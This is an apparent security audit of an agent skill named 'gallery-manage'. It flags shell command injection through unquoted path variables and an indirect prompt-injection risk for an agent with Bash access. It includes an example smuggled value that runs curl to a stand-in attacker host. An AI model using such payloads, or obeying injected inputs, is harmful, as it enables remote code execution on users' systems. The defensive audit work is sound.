The Agent Skills Directory

[COMMAND_EXECUTION] (HIGH): The skill is highly susceptible to shell command injection. User-controlled variables such as $GALLERY_ID and $GALLERY_PATH are interpolated directly into shell commands (e.g., find $GALLERY_PATH/originals, cd $GALLERY_PATH/originals, and mkdir -p content/galleries/$GALLERY_ID) without shell quoting or sanitization. * Evidence: The 'Validate Gallery Images' and 'Organize Gallery' sections use unquoted variables in find and cd commands. An attacker could provide a path like 'img; curl attacker.com/$(whoami)' to trigger remote code execution.
[INDIRECT_PROMPT_INJECTION] (HIGH): This skill exposes a high-risk attack surface for indirect prompt injection. * Ingestion point: The skill accepts untrusted directory paths and IDs via arguments. * Boundary markers: None present; inputs are directly embedded in shell scripts. * Capability inventory: The skill has the 'Bash' tool allowed and performs file system operations (Write, Read, Glob). * Sanitization: None; there is no validation to prevent directory traversal sequences (../) or shell metacharacters. If the agent processes a request from an untrusted source to 'manage' a gallery, the attacker can gain full control over the underlying shell environment.

gallery-manage